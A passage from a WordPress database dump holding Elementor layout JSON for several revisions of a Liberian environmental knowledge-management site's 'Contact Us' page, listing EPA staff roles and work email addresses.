Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"40\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1255a43\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"40\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong>\\n<br>\\nMEAs Officer\\n<br>\\nFocal Point of the United Nations Convention on Biological Diversity\\n<br>\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n\\nMEAs Officer\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cbbe26c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14682,2328,'_elementor_edit_mode','builder'),(14683,2328,'_elementor_template_type','wp-page'),(14684,2328,'_elementor_version','2.7.5'),(14685,2328,'_wp_page_template','default'),(14686,2328,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14695,2330,'_elementor_edit_mode','builder'),(14696,2330,'_elementor_template_type','wp-page'),(14697,2330,'_elementor_version','2.7.5'),(14698,2330,'_wp_page_template','default'),(14699,2330,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\n\\nGIS Coordinator<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14709,2333,'_elementor_edit_mode','builder'),(14710,2333,'_elementor_template_type','wp-page'),(14711,2333,'_elementor_version','2.7.5'),(14712,2333,'_wp_page_template','default'),(14713,2333,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact 